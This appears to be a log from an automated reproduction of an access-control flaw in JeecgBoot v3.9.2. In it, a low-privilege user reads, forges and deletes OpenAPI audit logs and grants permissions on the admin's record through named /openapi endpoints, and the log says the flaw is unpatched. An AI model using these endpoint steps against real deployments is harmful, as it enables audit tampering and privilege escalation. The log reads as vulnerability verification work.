[16:07:36] === Phase 1: Resolve repository path === [16:07:36] Using prepared project cache repo: /data/pruva/project-cache/1bafcc4a-a6c4-4674-9701-d751ad6480da/repo [16:07:36] ℹ Repo: /data/pruva/project-cache/1bafcc4a-a6c4-4674-9701-d751ad6480da/repo [16:07:36] ℹ Jar: /data/pruva/project-cache/1bafcc4a-a6c4-4674-9701-d751ad6480da/repo/jeecg-boot/jeecg-module-system/jeecg-system-start/target/jeecg-system-start-3.9.2.jar [16:07:36] ℹ Tested commit (v3.9.2): 7df07a823fd558be857d0208ccae96342539fbc1 [16:07:36] === Phase 2: Ensure dependencies === [16:07:36] JAVA_HOME=/usr/lib/jvm/java-17-openjdk-amd64, openjdk version "17.0.19" 2026-04-21 [16:07:36] === Phase 3: Start MariaDB and Redis === [16:07:36] ✓ MariaDB is running [16:07:36] ✓ Redis is running [16:07:36] === Phase 4: Ensure database initialized === [16:07:36] ✓ jeecg-boot database already seeded (ceshi user present) [16:07:36] ℹ ceshi role: test (expected: test — non-admin) [16:07:36] ℹ Admin OpenAPI auth id: 1922164194775056386 [16:07:36] ℹ open_api_log row count before variant: 27 [16:07:36] === Phase 5: Ensure jar built === [16:07:36] ✓ Jar already built: /data/pruva/project-cache/1bafcc4a-a6c4-4674-9701-d751ad6480da/repo/jeecg-boot/jeecg-module-system/jeecg-system-start/target/jeecg-system-start-3.9.2.jar [16:07:36] === Phase 6: Start JeecgBoot application === [16:07:36] ✓ JeecgBoot already running (HTTP 200) [16:07:36] === Phase 7: Variant reproduction === [16:07:36] Login as ceshi (low-priv, test role) [16:07:36] ✓ ceshi logged in (token len 155) [16:07:36] ✓ admin login captured [16:07:36] VARIANT A: OpenApiLogController /openapi/record/* [16:07:36] ℹ A1 GET /openapi/record/list -> success=True, total=27 [16:07:36] ✓ A1: ceshi read all OpenAPI audit logs [16:07:37] ℹ A2 POST /openapi/record/add -> success=True, persisted id=2073800977330876417 [16:07:37] ✓ A2: ceshi created an audit log (id=2073800977330876417) attributed to admin auth id [16:07:37] ℹ A3 DELETE /openapi/record/delete?id=2073800977330876417 -> success=True, db rows after=0 (expect 0) [16:07:37] ✓ A3: ceshi DELETED an audit log (tampering succeeded) [16:07:37] ℹ A4 GET /openapi/record/queryById -> success=True [16:07:37] ✓ A4: ceshi read a specific audit log by id [16:07:37] ✓ VARIANT A CONFIRMED: OpenApiLogController /openapi/record/* full CRUD by low-priv user [16:07:37] VARIANT B: OpenApiPermissionController /openapi/permission/* [16:07:37] ℹ B1 POST /openapi/permission/add -> success=True, permission rows persisted for admin auth id=2 [16:07:37] ✓ B1: ceshi granted OpenAPI permissions on admin's auth record [16:07:37] ℹ B2 GET /openapi/permission/getOpenApi -> success=True [16:07:37] ✓ B2: ceshi retrieved OpenAPI definitions for admin's auth record [16:07:37] ✓ VARIANT B CONFIRMED: OpenApiPermissionController /openapi/permission/* reachable by low-priv user [16:07:37] NEGATIVE CONTROL: /openapi/add (admin-protected) [16:07:37] ℹ negative control POST /openapi/add -> success=False, message=Subject does not have role [admin] [16:07:37] ✓ Negative control: /openapi/add correctly rejected low-priv user (authz enforced via @RequiresRoles) [16:07:37] === Phase 8: Verdict === [16:07:37] ✓ VARIANT REPRODUCED on JeecgBoot v3.9.2 (commit 7df07a823fd558be857d0208ccae96342539fbc1) — the LATEST available code. [16:07:37] ✓ No official patch exists; master HEAD is byte-identical to v3.9.2 for the affected controllers. [16:07:37] ✓ Primary variant: OpenApiLogController /openapi/record/* (NEW surface, not in CVE description).